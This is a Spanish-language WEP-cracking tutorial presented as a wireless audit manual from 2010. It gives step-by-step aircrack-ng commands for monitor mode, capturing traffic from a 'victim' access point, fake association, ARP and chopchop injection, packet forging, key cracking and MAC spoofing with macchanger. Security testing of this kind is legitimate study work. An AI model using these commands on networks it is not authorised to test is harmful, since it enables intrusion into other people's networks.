CASO1:

Manual de Auditora de Redes Inalmbricas (Wireless)

con Live CD de WifiWay v.1
El software a utilizar es Wifiway (una distribucin de seguridad Wi-Fi basada en Linux From
Scratch).
Se puede descargar de este link: http://download.wifislax.com:8080/wifiway-1-final.iso

Pasos a seguir:
Iniciar la carga del Live CD, eligiendo la opciones de america-lima, spanish, startX
Actualizar la versin del aircrack, iniciando un terminal de consola desde la carpeta de aircrack
y ejecutando los siguientes comandos:
#make clean

#make

#make install

Posterior al paso anterior, se sugiere crear una carpeta especfica de trabajo (ejemplo: redes),
desde la cual debe abrir el terminal de consola y ejecutar los siguientes comandos:

Todos los derechos reservados 2010

Ing. Jos Madrid Rentera
Richard Paredes Saavedra

#iwconfig
Permite apreciar el tipo de chipset de nuestra tarjeta de red inalmbrica (la sigla de la antena
que se debe utilizar para poder ponerse en modo monitor).

#airmon-ng start wlan0

Permite ingresar en modo monitor a la tarjeta inalmbrica:

Todos los derechos reservados 2010

Ing. Jos Madrid Rentera
Richard Paredes Saavedra

#airodump-ng wlan0
Permite ver los AP (Acess Point) disponibles en el entorno o capacidad del espectro de
radiacin, esto es conocido como sniffer

#airodump-ng -c 9 --bssid 00:02:CF:XX:XX:XX -w captura wlan0

Permite hacer un scaneo por MAC en donde se detalla:
-c es el canal
--bssid permite ingresar la MAC del AP a atacar.
-w crea un archivo .CAP para el almacenamiento de los ARP

Todos los derechos reservados 2010

Ing. Jos Madrid Rentera
Richard Paredes Saavedra

#aireplay-ng -1 0 -e SSID -a 00:02:CF:XX:XX:XX -h 00:01:02:03:04:05 wlan0

Permite la asociacin con el AP
-1 es el comando asociado con aireplay-ng que nos permite la asociacin al AP
0 es las veces que se repetir la asociacin al AP esto varia como se ve en el grafico
SSID es el nombre de red del AP a atacar.
-a el ingreso de la MAC victima
-h el ingreso de nuestra MAC
Wlan0 son las siglas de nuestra tarjeta de red

Todos los derechos reservados 2010

Ing. Jos Madrid Rentera
Richard Paredes Saavedra

#aireplay-ng -3 -e SSID -b 00:02:CF:XX:XX:XX -h 00:01:02:03:04:05 wlan0

Permite la inyeccin de los ARP al AP en otras palabras se podra decir que permite fomentar
trfico en la red.

Todos los derechos reservados 2010

Ing. Jos Madrid Rentera
Richard Paredes Saavedra

#aircrack-ng captura-01.cap
Permite descifrar los ARP capturados a la hora de hacer el proceso anterior
captura-01.cap es el archivo creado a la hora del escaneo por MAC

Todos los derechos reservados 2010

Ing. Jos Madrid Rentera
Richard Paredes Saavedra

CASO2:
Manual de Auditora de Redes Inalmbricas (Wireless)
con Live CD de WifiWay v.2.0.1

Tipo de tarjeta
#iwconfig
Aqu nos dir, si nuestra tarjeta es reconocida por el sistema o no lo es. Bien sabiendo ya la
interface de nuestra tarjeta que puede ser, wlan0, wlan1, ath0, etc, etc, dependiendo del chipset
claro est. En este caso es wlan0, (puesto que es Realtek)

Modo monitor
#iwconfig wlan0 mode monitor
#airmon-ng start wlan0

Escaneo de las redes

#airodump-ng wlan0
#airodump-ng -c ch -bssid (Mac del AP) -w (nombre archivo) wlan0
#airodump-ng c 6 -bssid aa:bb:cc:dd:ee:ff w lan wlan0

Asociacin
#aireplay-ng -1 30 -o 1 -e (nombre bssid) -a aa:bb:cc:dd:ee:ff -h (Mac de nuestra tarjeta) wlan0
#aireplay-ng -1 30 -o 1 -e PERICO -a aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 wlan0
#aireplay-ng -1 30 -o 1 -e PERICO DE LOS PALOTES -a aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55
wlan0

Todos los derechos reservados 2010

Ing. Jos Madrid Rentera
Richard Paredes Saavedra

Ataque 3
#aireplay-ng -3 -b Mac vctima -h aa:bb:cc:dd:ee:ff interface
#aireplay-ng -3 -b aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 wlan0

Ataque 2
#aireplay-ng -2 p 0841 c ff:ff:ff:ff:ff:ff b (bssid del Ap) h (nuestra bssid o la del cliente) wlan0
#aireplay-ng -2 p 0841 c ff:ff:ff:ff:ff:ff b aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 wlan0

Ataque 4
#aireplay-ng -4 -b Mac vctima -h aa:bb:cc:dd:ee:ff interface
#aireplay-ng -4 -b aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 wlan0
#tcpdump -s 0 -n -e -r [archivo.cap]
#packetforge-ng -0 -a 00:02:CF:XX:XX:XX -h 00:11:22:33:44:55 -k 192.168.1.255 -l 192.168.1.1 -y
[archivo.xor] -w arp
Primero se pone el Segundo ip y luego el primer ip
#aireplay-ng -2 -x 1024 -h 00:11:22:33:44:55 -r arp ath0
Nosotros le aadimos la opcin -x 1024, para que inyecte 1024 paquetes por segundo, por defecto
son 600 (creo). Algunos AP se saturan al inyectar a 1024, o pude que incluso se bloqueen con la
opcin por defecto, (600), si vemos que al lanzar el A2 empieza a inyectar, y se para a los pocos
segundos, relanzaremos el A2 aadiendo la opcin -x 300.

Desemcriptacion
#aircrack-ptw (nombre archivo)-01.cap
#aircrack-ptw lan-01.cap
#aircrack-ng lan-01.cap
#aircrack lan-01.cap

Todos los derechos reservados 2010

Ing. Jos Madrid Rentera
Richard Paredes Saavedra

Cambio de MAC
#macchanger -m 00:11:22:33:44:55 wlan0

Todos los derechos reservados 2010

Ing. Jos Madrid Rentera
Richard Paredes Saavedra